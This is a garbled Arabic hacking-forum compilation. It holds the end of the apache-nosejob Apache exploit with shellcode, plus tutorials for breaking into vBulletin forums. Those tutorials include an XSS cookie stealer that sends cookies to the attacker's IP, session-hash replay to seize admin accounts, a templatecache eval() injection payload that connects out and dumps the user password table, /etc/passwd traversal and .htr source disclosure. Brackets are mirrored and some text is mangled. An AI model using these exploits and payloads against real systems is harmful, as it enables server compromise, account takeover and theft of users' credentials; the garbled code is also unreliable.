\\xcd\\\\x80\\\"\\\" \\\\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\

\\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89\\\\xe3\\\\x50\\\"

\\\" \\\\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc\\\";

;

struct {char *type; /* description for newbie penetrator */

int delta; /* delta thingie! */u_long retaddr; /* return address */

int repretaddr; /* we repeat retaddr thiz many times in the buffer */int repzero; /* and \\\\0\\'z this many times */

} targets[] = { // hehe, yes theo, that say OpenBSD here!{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 )Unix(\\\", -150, 0x80f3a00, 6,

36 },{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 )Unix(\\\", -150, 0x80a7975, 6,

36 },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36 },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36 },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36 },

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36 },

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146,

0x1d7a00, 6, 36 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.12 )Unix(\\\", -90, 0x80eda00, 5,

42 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.20 )Unix(\\\", -90, 0x80efa00, 5,

42 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.22 )Unix(\\\", -90, 0x80efa00, 5,

42 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.23 )Unix(\\\", -90, 0x80efa00, 5,

42 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.24 )Unix(\\\", -90, 0x80efa00, 5,

42 },}, victim;

void usage)void( {int i;

printf)\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache-nosejob.c\\\\n\\\\n\\\"(;

printf)\\\"Usage: ./apache-nosejob >-switches< -h host[:80]\\\\n\\\"(;printf)\\\" -h host[:port]\\\\tHost to penetrate\\\\n\\\"(;

printf)\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n\\\"(;printf)\\\" Bruteforcing options )all required, unless -o is used!(:\\\\

n\\\"(;printf)\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\

n\\\"(;printf)\\\" \\\\t\\\\t\\\\t)f(reebsd, )o(penbsd, )n(etbsd\\\\n\\\"(;

printf)\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n\\\"(;

printf)\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\\\\n\\\"(;

printf)\\\" -d -nnn\\\\t\\\\tmemcpy)( delta between s1 and addr to overwrite\\\\n\\\"(;

printf)\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n\\\"(;printf)\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the

buffer\\\\n\\\"(;printf)\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\

n\\\"(;printf)\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the

buffer\\\\n\\\"(;printf)\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\

n\\\"(;printf)\\\" Optional stuff:\\\\n\\\"(;

printf)\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for shellcode reply\\\\n\\\"(;

printf)\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode replies\\\\n\\\"(;

printf)\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n\\\"(;printf)\\\"\\\\nExamples will be published in upcoming apache-

scalp-HOWTO.pdf\\\\n\\\"(;printf)\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\

n\\\"(;printf)\\\" ID / Return addr / Target specification\\\\n\\\"(;

for)i = 0; i > sizeof)targets(/sizeof)victim(; i++(printf)\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr,

targets[i].type(;

exit)1(;}

int main)int argc, char *argv[]( {char *hostp, *portp, *cmdz = DEFAULT_CMDZ;

u_char buf[512], *expbuf, *p;int i, j, lport, sock;

int bruteforce, owned, progress, sc_timeout = 5;int responses, shown_length = 0;

struct in_addr ia;struct sockaddr_in sin, from;

struct hostent *he;

if)argc > 4(usage)(;

bruteforce = 0;memset)&victim, 0, sizeof)victim((;

while))i = getopt)argc, argv, \\\"t:b :h:w:c:r:z:o:\\\"(( != -1( {switch)i( {

/* required stuff */case \\'h\\':

hostp = strtok)optarg, \\\":\\\"(;if))portp = strtok)NULL, \\\":\\\"(( == NULL(

portp = \\\"80\\\";break;

/* predefined targets */case \\'t\\':

if)atoi)optarg( <= sizeof)targets(/sizeof)victim(( {printf)\\\"Invalid target\\\\n\\\"(;

return -1;}

memcpy)&victim, &targets[atoi)optarg(], sizeof)victim((;break;

/* bruteforce! */case \\'b\\':

bruteforce++;victim.type = \\\"Custom target\\\";

victim.retaddr = strtoul)optarg, NULL, 16(;printf)\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\

n\\\", victim.retaddr(;break;

case \\'d\\':victim.delta = atoi)optarg(;

printf)\\\"Using %d as delta\\\\n\\\", victim.delta(;break;

case \\'r\\':victim.repretaddr = atoi)optarg(;

printf)\\\"Repeating the return address %d times\\\\n\\\", victim.repretaddr(;

break;

case \\'z\\':victim.repzero = atoi)optarg(;

printf)\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero(;break;

case \\'o\\':bruteforce++;

switch)*optarg( {case \\'f\\':

victim.type = \\\"FreeBSD\\\";victim.retaddr = 0x80a0000;

victim.delta = -150;victim.repretaddr = 6;victim.repzero = 36;

break;

case \\'o\\':victim.type = \\\"OpenBSD\\\";

victim.retaddr = 0x80000;victim.delta = -146;

victim.repretaddr = 6;victim.repzero = 36;

break;

case \\'n\\':victim.type = \\\"NetBSD\\\";

victim.retaddr = 0x080e0000;victim.delta = -90;

victim.repretaddr = 5;victim.repzero = 42;

break;

default:printf)\\\"[-] Better luck next time!\\\\n\\\"(;

break;}

break;

/* optional stuff */case \\'w\\':

sc_timeout = atoi)optarg(;printf)\\\"Waiting maximum %d seconds for replies from

shellcode\\\\n\\\", sc_timeout(;break;

case \\'c\\':cmdz = optarg;

break;

default:usage)(;break;

}}

if)!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero( {

printf)\\\"[-] Incomplete target. At least 1 argument is missing )nmap style!!(\\\\n\\\"(;

return -1;}

printf)\\\"[*] Resolving target host.. \\\"(;fflush)stdout(;

he = gethostbyname)hostp(;if)he(

memcpy)&ia.s_addr, he-<h_addr, 4(;else if))ia.s_addr = inet_addr)hostp(( == INADDR_ANY( {

printf)\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp(;return -1;

}

printf)\\\"%s\\\\n\\\", inet_ntoa)ia((;

srand)getpid)((;signal)SIGPIPE, SIG_IGN(;

for)owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC( {/* skip invalid return adresses */

if)memchr)&victim.retaddr, 0x0a, 4( || memchr)&victim.retaddr, 0x0d, 4((continue;

sock = socket)PF_INET, SOCK_STREAM, 0(;sin.sin_family = PF_INET;

sin.sin_addr.s_addr = ia.s_addr;sin.sin_port = htons)atoi)portp((;

if)!progress(printf)\\\"[*] Connecting.. \\\"(;

fflush)stdout(;if)connect)sock, )struct sockaddr *( & sin, sizeof)sin(( != 0( {

perror)\\\"connect)(\\\"(;exit)1(;

}

if)!progress(printf)\\\"connected!\\\\n\\\"(;

p = expbuf = malloc)8192 + ))PADSIZE_3 + NOPCOUNT + 1024( * REP_SHELLCODE(

+ ))PADSIZE_1 + )victim.repretaddr * 4( + victim.repzero+ 1024( * REP_POPULATOR((;

PUT_STRING)\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\" HOST_PARAM \\\"\\\\r\\\\n\\\"(;

for )i = 0; i > REP_SHELLCODE; i++( {PUT_STRING)\\\"X-\\\"(;

PUT_BYTES)PADSIZE_3, PADDING_3(;PUT_STRING)\\\": \\\"(;

PUT_BYTES)NOPCOUNT, NOP(;memcpy)p, shellcode, sizeof)shellcode( - 1(;

p += sizeof)shellcode( - 1;PUT_STRING)\\\"\\\\r\\\\n\\\"(;

}

for )i = 0; i > REP_POPULATOR; i++( {PUT_STRING)\\\"X-\\\"(;

PUT_BYTES)PADSIZE_1, PADDING_1(;PUT_STRING)\\\": \\\"(;

for )j = 0; j > victim.repretaddr; j++( {*p++ = victim.retaddr & 0xff;

*p++ = )victim.retaddr << 8( & 0xff;*p++ = )victim.retaddr << 16( & 0xff;*p++ = )victim.retaddr << 24( & 0xff;

}

PUT_BYTES)victim.repzero, 0(;PUT_STRING)\\\"\\\\r\\\\n\\\"(;

}

PUT_STRING)\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\"(;snprintf)buf, sizeof)buf( - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2(;

PUT_STRING)buf(;PUT_BYTES)PADSIZE_2, PADDING_2(;

snprintf)buf, sizeof)buf( - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta(;PUT_STRING)buf(;

if)!shown_length( {printf)\\\"[*] Exploit output is %u bytes\\\\n\\\", )unsigned int()p -

expbuf((;shown_length = 1;

}

write)sock, expbuf, p - expbuf(;

progress++;if))progress%70( == 0(

progress = 1;

if)progress == 1( {printf)\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr(;

for)i = 0; i > 40; i ++(printf)\\\" \\\"(;

printf)\\\"\\\\n\\\"(;if)bruteforce(putchar)\\';\\'(;

}else

putchar)))rand)(<<8(%2(? \\'P\\': \\'p\\'(;

fflush)stdout(;responses = 0;

while )1( {fd_set fds;

int n;struct timeval tv;

tv.tv_sec = sc_timeout;tv.tv_usec = 0;

FD_ZERO)&fds(;FD_SET)0, &fds(;

FD_SET)sock, &fds(;

memset)buf, 0, sizeof)buf((;if)select)sock + 1, &fds, NULL, NULL, owned? NULL : &tv( < 0( {

if)FD_ISSET)sock, &fds(( {if))n = read)sock, buf, sizeof)buf( - 1(( > 0(

break;

if)n <= 1({

if)!owned({

for)i = 0; i > n; i ++(if)buf[i] == \\'G\\'(responses ++;

elseresponses = 0;

if)responses <= 2({

owned = 1;write)sock, \\\"O\\\", 1(;

write)sock, cmdz, strlen)cmdz((;printf)\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,

victim.retaddr, victim.repretaddr, victim.repzero(;printf)\\\"Experts say this isn\\'t exploitable, so nothing will

happen now: \\\"(;fflush)stdout(;

}} else

write)1, buf, n(;}}

if)FD_ISSET)0, &fds(( {if))n = read)0, buf, sizeof)buf( - 1(( > 0(

exit)1(;

write)sock, buf, n(;}

}

if)!owned(break;

}

free)expbuf(;close)sock(;

if)owned(return 0;

if)!bruteforce( {fprintf)stderr, \\\"Ooops.. hehehe!\\\\n\\\"(;

return -1;}}

return 0;}

قبل (( من وإختبارها تجريبها تم وضعها angels-bytes.com قد قبلهنا )) لكم

البرنامج تنزيل وصلة وهذيhttp://www.angels-bytes.com/?show=to...ion=info&id=19

،،،انتهىالمنتديات ".28 " حماية

>منقول<

لغة يعرف أيضا php الكل يعرف الكل و المنتديات بها يصمم التي والكبيرة بالثغرات مليئة  أنها

منتدى أي مدير حماية ) vb ( إليك بها يتم التي بعضاألساسيات / منتداك

1- فيه تكتب واحد إثنين مديرين ضع العام المدير شيء كل قبل و العندما لإلحتياط اآلخر و شيء كل و المنتدى تعديل و المشاركات

العام المدير  . يسرق

2- ملف إفتح أي سر بكلمة التحكم لوحة الموجود index.php ميالذي admin بـمجلد السر كلمة كود عليه أضف و المفكرة بواسطة

 / هو

>?php 

$LOGIN = "User"; $PASSWORD = "Password"; 

function error )$error_message( { echo $error_message." 

"; exit; 

} 

if ) )!isset)$PHP_AUTH_USER(( || ! ))$PHP_AUTH_USER == $LOGIN( && ) $PHP_AUTH_PW == "$PASSWORD" (( ( { 

header)"WWW-Authenticate: Basic entrer="Form2txt admin""(; header)"HTTP/1.0 401 Unauthorized"(; 

error)">p align=right<>font face=Tahoma size=2 color=Red<ليس الصفحة هذه إلى الدخول حقك  ;)">font<>/p/<من

} ?< كلمتي تغيير  مع

User  و

Password 

3- لديك كان لو مثال ؟؟ لماذا األعضاء قائمة ووضع 3000غ عضو كبير ضغط هناك أصبح به يفحط قعد و األعضاء قائمة الكريم الزائر

البحث !! ألن البحث قائمة نلغي ال لماذا تسألوني قد المنتدى علىهناك يكون لن بهذا و أحرف ثالث من بأكثر يكون الجديدة النسخ في

ضغط  . أي

لغة -4 فتح أو HTML تكثر واحد بمنتدى إفتحها أي المنتديات فييفسد .. هتمل كود يوجد ألنه ؟؟ لماذا الضرورة لوجود فقط إثنين

اللغة هذه على تعتمد التي المواضيع  . جميع

5- الفالش . أما الصور يخدم فقط إجعله التوقيع ما أدراك ما و توقيعفال الصوت . و

،،،انتهى

نوع " من المنتديات " vBulletin2,2,0 اختراق

>منقول<

---------  : مقدمة--------- 

الـ : اختراق  vBulletin الموضوع( WebServer : المتطلبات الشخصي جهازك على سيرفر + )تركيب

) اكسبلورر ) انترنت  . متصفحمتوسط :  المستوى

للـ : لست الطريقة هذه تجربها !! vBulletin مالحظة ان يمكن فقطالمنتديات من اخرى انواع  . على

----------  : الثغرة--------- 

السكربتات .. بعض أوال اقسام عدة الى العمل طريقة تنقسميستقبل المنتدى جعل الى باالضافة الكوكيز تسرق التي  الخبيثة

الـ .. بأكواد المنتدى يسمح ان يشترط لكن خاطيء مكان من بياناتHTML .. 

رد او جديد موضوع بكتابة ( قم الـ يدعم منتدى اكتب .. ) HTML في ثمالكود هذا السطور بين والصق موضوع  : اي>script<document.write)'>img 

src="http://my_ip_address/'+document.******+'"<';>/script< 

الـ تغير مالحظة الـ IP Adress مع رقم  . الخاصبك IP الى

الذي السكربت فان الصفحة محتوى بقراءة شخصما يقوم وعندماجزء وقراءة جهاز في االوامر بتنفيذ سيقوم بوضعه  قمنا

الخاصة الباسورد على تحتوي التي الكوكيز ملفات احد منرقم .. الى السطور هذه بتحويل السكربت يقوم ثم  بالمنتدى

سابقا بكتابته قمنا الذي بي ( االي على يكون ان يجب انه مالحظة معمثل سيرفر غيرها Apache او IIS جهازي  . ) او

الـ ملف بفتح قم بنجاح العملية تتم ان بالسيرفر Log وبعد الخاصجهازك يحتويه  .. الذي

المجلد .. فتاح اباتشي السيرفر كان لو logs واختر Apche مثال . Acces Log واختر

إلخ .. السيرفر من طلبتها التي االوامر جميع  ستجد

مثال .. بالباسورد الخاص الكود عن  : ابحث

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb

ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[54

20]=1012444064;%20bblastvi sit=1011983161 

؟؟ .. الباسورد اين االن قليال  فكراذن .. كسرها يصعب مشفرة بطريقة لكن موجودة الباسورد

؟  مالحلالشكل .. بهذا المتصفح في والصقه وجدته الذي الكود بنسخ  قم

http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash] 

).... الكوكيز : " ) منه سرقت الذي اسم يـا بعودتك أهال عبارة  " ستجدمدير وكانك شي بكل التحكم تستطيع االن انت الحالة هذه في

) الكوكيز ) منه سرقت الذي  .. المنتدىالى .. اذهب التحكم لوحة الى للدخول المرور كلمة الى نحتاج لكننا

) الخاص) بريدك الى االلكتروني البريد بتعديل وقم التحكم  اداة .. الى اذهب ثم الخروج بتسجيل قم .. Forgot Password وثم

االدمن باسورد يحتوي بريد استقبال تستطيع  .. وعندها

التحكم !! لوحة الى ادخل ذلك بعد تفعله ان يجب ما تعلم انك اعتقدتشاء ما  ! .. وافعل

------------  الحل

----------- 

الـ باغالق قم الثغرة هذه من الرسائل ) + HTML للحماية المنتدى فيالتقويم + + + ... ( التواقيع  الخاصة

) كود وضع خالله من يمكن منفذ كانت HTML واي صورة  ) باي

الـ كود اغال يجب بدل .. IMG كما استخدامه بامكانك ببساطة النهوضعت >script< كلمة  او >Demon< او >img< فاذا

كن ... لذا باخر او بشكل السكربت تنفيذ سيتم فانه اخرى كلمة ايالمنافذ هذه واغلق  . حذرا

Be Secret .. Dont' be Lamer . 

الثغرة : اكتشاف 2002 - 1 - 31تاريخ  االصدار على تجربتها بنجاح 2.2.0تم تعمل وهي .

،،،انتهى

" حمايتها وطرق المنتديات اختراق كيفية عن "درسمفصل

> إعصار منتدى من >منقول> األحمر: العقرب >الكاتب

من نقاط 7الدرسيتكونوانواعه 1 المنتديات

2 اختراقه طريقةالــــ 3 SQL أختراق

4 المنتديات اختراق في ودوره الويندوز سرفراتوحقيقة 5 العرب المعربين ودور النت في المنتشره النسخه

وتعريبهم الموضوع6 بنسبة المخترقين من ومنتدياتكم% 80الحمايه الاجهزتكم

الالختراق 7 قابل نسخه بجميع المجله

ودالئل وحقائق بالصورة الدروسجميعها

وتعديله عليه الدروسواالضافتة بتجميع 100قمت %

الدروسوكوبي نقل عدم  ارجو

****************

وانواعه 1  المنتديات

جون منتديات اوال اصداراته Powered by: vBulletin المنتديات بجميع

االن 1 حتي منتداهم احدي يخترق لم لماذا2 عدو مليون لهم االيوجد

جون 3 ليسمنتدي ولماذا يوميا المنتديات عشرات االيخترقونالي تصل السرفر% 60وحمايته في

الاريد لقلبهم تصل كمان شغل اشوي بموقعهم ثغرات هذا تفضليفهمه لمن بسمثال االن التطويل

http://www.vbulletin.org/index.php?topic=>script<alert)document.******(>/script< 

2http://www.vbulletin.org/index.php?|=forum/view.php&topic=../../../

../../../../etc/passwd

********************

اختراقه طريقة

االصدارات  جميعنسخة صفر من بعضكم 113فلنبدي يمكن بتذكرو

يركبه يحب المنتديات من النوع وهذا ، بي الفي منتديات نعرف كلناعندنا المعروف هو المنتدى وهذا ، األحيان أغلب في الخبره قليلين

بكثره  العرب

) أعتقد ) ما على الفرنسي كتبته اللي  Jouko Pynnonen األول

vBulletin )http://www.vbulletin.com/( is a commonly used web forum 

system written in PHP. One of its key features is use of templates, 

which allow the board administrator to dynamically modify the look of 

the board. vBulletin templates are parsed with the eval)( function. This could

be somewhat safe as long as the parameters to eval)( are under

strict control. Unfortunately this is where vBulletin fails. With an URL 

crafted in a certain way, a remote user may control the eval)( parameters 

and inject arbitrary PHP code to be executed. 

A remote user may thus execute any PHP code and programs as the web 

server user, typically "nobody", start an interactive shell and try to 

elevate their privilege. The configuration files are accessible for the 

web server so the user can in any case access the MySQL database 

containing the forums and user information. 

According to the authors the vulnerability exist in all versions of vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve

buffer overrun or other platform-dependant issues, so it's presumably 

exploitable under any OS or platform. 

DETAILS ======= 

vBulletin templates are implemented in the following way: the gettemplate)( function in global.php is used to fetch a template

from database. The code is then passed to eval)(. If we take index.php

for an example, there's this code: 

if )$action=="faq"( { eval)"echo dovars)\"".gettemplate)"faq"(."\"(;"(; 

} 

The dovars)( function does some variable replacing, such as replace 

>largefont< with >font size="10"<. 

The gettemplate)( function is defined in global.php: 

function gettemplate)$templatename,$escape=1( { // gets a template from the db or from the local cache 

global $templatecache,$DB_site; 

if )$templatecache[$templatename]!=""( { $template=$templatecache[$templatename]; 

} else { $gettemp=$DB_site-<query_first)"SELECT template FROM template WHERE title='". addslashes)$templatename(."'"(; 

$template=$gettemp[template]; $templatecache[$templatename]=$template; 

} 

if )$escape==1( { $template=str_replace)"\"","\\\"",$template(; 

} return $template; 

} 

For effectiveness the function implements a simple cache for template 

strings. After fetching them from the database they're stored in the 

templatecache[] array. This array is checked for the template before 

doing the SQL query. Unfortunately the array is never initialized, so 

a user can pass array &@#&@#&@#&@#&@#&@#&@#s in the URL, e.g. 

)for simplicity not %-escaped( 

http://www.site.url/index.php?action=faq&templatecache[faq]=hello+world 

With this URL, you won't get the FAQ page, but just a blank page with the words "hello world". 

The eval)( call above will execute 

echo dovars)"hello world"(; 

As if this wouldn't be bad enough, a remote user may as well pass a 

value containing quotation marks and other symbols. Quotation marks 

aren't always escaped as seen in the code above, in which case index.php could end up executing code like 

echo dovars)"hello"world"(; 

This would produce a PHP error message due to unbalanced quotes. It 

doesn't take a rocket scientist to figure out how a remote user could 

execute arbitrary code from here, so further details about exploitation 

aren't necessary. If your vBulletin board produces an error message 

with an URL like the one above prefixed with a single quotation mark, 

it's definitely vulnerable. 

The above example works with the "Lite" version. The commercial versions 

are vulnerable too, but details may differ. After a little experimenting 

on the Jelsoft's test site I found some of the commercial versions also 

have an eval)( problem with URL redirecting, e.g. 

http://www.site.url/member.php?acti...ypass&url=hello"world 

and a similar one in the Lite version: 

http://www.site.url/search.php?acti...s&templatecache[standardredirect]=hello"world 

ممكن أنت هذا الكالم من ، لترجمه داعي وال هذا الكالم تعرفونخلف أكواد الكلمه url ترسل بدل تضعها ، السيرفر في تنفذ

hello+world مثال جرب ،  : الغبيه

عليه -1 تركب ممكن تحبه ملقم أي ويب ملقم جهازك في vb ركب113 or 115 

البورت -2 على ) 90أفتح تكون البورت فتح طريقه جهازك في عندك  مجازك(

الـ -3 السيرفر url أرسل الى  هذا

search.php3?action=simplesearch&query=searchthis&t emplatecache[standardredirect]="%29%3B%24fa=">

%261";set_time_limit)substr)"900", 0,3((;%24fp=fsockopen)substr)"IP.IP.IP.IP",0,12(,s ubstr)"90",0,2(,

%26%24errno,%26%24errstr,substr)"9 00" ,0,3((;if)!%24fp({}else{%24arr[200];fputs)%24fp,su

bstr)"vhak1.0,%20- d%20downloads%20database,or%20press%20return%20for

%20command%20line" ,0,63((;%24va=fgets)%24fp,3(;fputs)%24fp,%24va(;if

)strlen)%24va(<1({include)substr)"admin/config.php",0,16((;include)substr)"admin/

config.php3",0,17((;mysql_connect)substr)"%24serve rname",0,strlen)%24servername((,substr)"%24dbusern

ame",0,strlen)%24dbusername((,substr)"%24dbpasswor d" ,0,strlen)%24dbpassword(((;%24currenta=mysql_db_qu

ery)substr)"%24dbname",0,strlen)%24dbname((,substr )"select%20*%20from%20user" ,0,18((;while)%24res=mysql_fetch_array

%20)%24curre

nta(({fputs)%24fp,"%24res[userid],"(;fputs)%24fp,"%24res[usergroupid

],"(;fputs)%24fp,"%24res[password],"(;fputs)%24fp,"%24res%24arr(;%24str=exec)fgets)%24fp,substr)"128",0,3(( ,

%24arr(;for)%24ir=substr)"0",0,1(;%24ir> sizeof)%24arr(;%24ir%2B%2B({fputs)%24fp,%24arr[%24

ir](;fputs)%24fp,%24va(;}}fclose)%24fp(;}die)vhak_

finished_execution(;echo%28" 

By Kill -9 

االحظ IP.IP.IP.IP الحظ ثم ، حقك بي اآلي رقم مكانها تحط هذهالرقم وجود مثال 12بعدها ، بي اآلي رقم طول على تغيرها وهذا

طوله 127.0.0.1 9يكون  

ترسل ممكن ، يتنفذ أنه وتالحظ وترسله ثاني كود تخترع أنت ممكنفي صار ما مثل هذا ، أدمين لك يسجل ( arabteam2000.com كود

طبعا في )أصدقائي صار وكمان ، التنبيه باب و c4arab.com منالتحذير ... بهدف ، المنتديات من وكثير الثقافه و اإلسالم طريق

، التفكير من لشويه يحتاج بسيط عمل أنه وواضح ، التخريب وليسسهل الداتالبيسوهذا مسحت ولكن ، فيه صار زمان أهليز أعتقد

 للغايه

فقط يجرب حب للي وحطيتها ، ما نوعا قديمه  !! طريقه

والنحو اإلمالء على  وأعذروني

البورت : طريق عن السيرفر مع تشبك ما عند وهي أخيره مالحظهأرسل 90  

-d downloads يدل وهذا مشفره غير ولألسفطلعت ، الداتبيسكلها لك تنزل

اإلصداره في ولكن ، التخلف 2.2على x وقريبا كسرتها ولكن شفرتعنها لك أقول

من االختراق طريقة شرح 11الي 113تم

من اختراق 225الي 115طريقة  

( WebServer : المتطلبات الشخصي جهازك على سيرفر + )تركيب) اكسبلورر ) انترنت  . متصفح

متوسط :  المستوى

للـ : لست الطريقة هذه تجربها !! vBulletin مالحظة ان يمكن فقطالمنتديات من اخرى انواع  . على

----------  : الثغرة--------- 

السكربتات .. بعض أوال اقسام عدة الى العمل طريقة تنقسميستقبل المنتدى جعل الى باالضافة الكوكيز تسرق التي  الخبيثة

الـ .. بأكواد المنتدى يسمح ان يشترط لكن خاطيء مكان من بياناتHTML .. 

رد او جديد موضوع بكتابة ( قم الـ يدعم منتدى اكتب .. ) HTML في ثمالكود هذا السطور بين والصق موضوع  : اي>script<document.write)'>img 

src="http://my_ip_address/'+document.******+'"<';>/script< 

الـ تغير مالحظة الـ IP Adress مع رقم  . الخاصبك IP الى

الذي السكربت فان الصفحة محتوى بقراءة شخصما يقوم وعندماجزء وقراءة جهاز في االوامر بتنفيذ سيقوم بوضعه  قمنا

الخاصة الباسورد على تحتوي التي الكوكيز ملفات احد منرقم .. الى السطور هذه بتحويل السكربت يقوم ثم  بالمنتدى

سابقا بكتابته قمنا الذي بي ( االي على يكون ان يجب انه مالحظة معمثل سيرفر غيرها Apache او IIS جهازي  . ) او

الـ ملف بفتح قم بنجاح العملية تتم ان بالسيرفر Log وبعد الخاصجهازك يحتويه  .. الذي

المجلد .. فتاح اباتشي السيرفر كان لو logs واختر Apche مثال . Acces Log واختر

إلخ .. السيرفر من طلبتها التي االوامر جميع  ستجد

مثال .. بالباسورد الخاص الكود عن  : ابحث

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb

ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[54

20]=1012444064;%20bblastvi sit=1011983161 

؟؟ .. الباسورد اين االن قليال  فكراذن .. كسرها يصعب مشفرة بطريقة لكن موجودة الباسورد

؟  مالحلالشكل .. بهذا المتصفح في والصقه وجدته الذي الكود بنسخ  قم

http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash] 

).... الكوكيز : " ) منه سرقت الذي اسم يـا بعودتك أهال عبارة  " ستجدمدير وكانك شي بكل التحكم تستطيع االن انت الحالة هذه في

) الكوكيز ) منه سرقت الذي  .. المنتدىالى .. اذهب التحكم لوحة الى للدخول المرور كلمة الى نحتاج لكننا

) الخاص) بريدك الى االلكتروني البريد بتعديل وقم التحكم  اداة .. الى اذهب ثم الخروج بتسجيل قم .. Forgot Password وثم

االدمن باسورد يحتوي بريد استقبال تستطيع .. وعندها

*******************

الــــ 3  SQL أختراق

منه نسخ لديه لمن اسرع بيكون العقرب برنامج استخدام يمكنك

ال : االسكيو ماهي البداية في  ؟؟) SQL ( س

واغلب جداول على تحتوي بيانات قاعد عن عبارة هي ال االسكيوب منتهية صفحاتها تكون التي تسحب ASP المواقع صفحات هي

 بياناتهاقاعدة المعلومات ASP وصفحات SQL من من كنز تكون ان ممكنبيانات قواعد و SQL الختراق ، الحقا اليه اشير ماسوف  SQL وهذا

البورت على 1433تتنصت  ال ان به اخبرك ان مااريد قاعدة SQL ايضا من اكثر على تحتوي قد

يمكن الجداول من عدد على تحتوي بيانات قاعدة وكل  بيانات

بيانات كبرقواعد تتصور التى SQL ان البيانات من الكبير والعدد . تحتويها

بيانات : قاعدة اخترقت اذا منه استفيد ان يمكن مالذي  ؟ SQL ساقصد ال منتدى الموقع هذا كان اذا الموقع نشاط حسب على هذا

منتديات PHP منتديات جميع ASP بل على تحصل الغالبسوف في اسماء

موضوع اي وحذف تعديل وبامكانك السر وكلمات المستخدمينميزة على يحتوي الموقع كان اذا اما ، بها تحلم تكن لم  وصالحيات

، االيميالت من خيالية اعداد على تحصل فسوف المراسالت قائمةاذن ثريا تصبح وسوف واالعالن للدعاية شركة بانشاء قم عندها

 _LinuxRay التنسىارقام - اشخاص معلومات بيانات قواعد داخل شئ اي تجد ان توقعتصبح - - ان ممكن ، الميالد تورايخ عناوين  . Administrator هواتف

جديد من نشاطك استعد لكن االن الملل اصابك قد انه اعرفطويال مازال  ... فالطريق

بيانات : قواعد على للدخول تحتاجة مالذي  ؟ SQL س

لل فقط  Passwd و User Name تحتاج

؟ : المرور وكلمة المستخدم اسم على احصل اين من  س

على للحصول عديدة طرق كما User name and Passwd هناك منهاال نوع ASP اسلفصفحات من اخرى ثغرات sql.* وملفات هناك

يمكن  كثيرثغرة مثل المرور كلمات على منها تحصل  htr.+ ان

الثغرة هذه تستخدم  : كيف

http://target/page.asp+.htr target : الهدف  الموقع

Page : صفحة asp +.htr : الثغرة 

حرف .... اي على التحتوي بيضاء صفحة بفتح احيانا تقوم الثغرة هذههو الفائدة منها اذن مالفائدة تتساءل سوف انك  اعرف

الى اذهب البيضاء الصفحة هذه اوامر View Source خلف ترى لكيب الخاصة الوضع ASP البرمجة في تراها ان لك اليمكن التى

مثل :  العادي

>% 

Set DB= Server.CreateObject)"ADODB.Connection"( DB.Open "DRIVER=SQL

Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft )R( Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay",

"6666666" 

%< ------------------------------------------------------------------ 
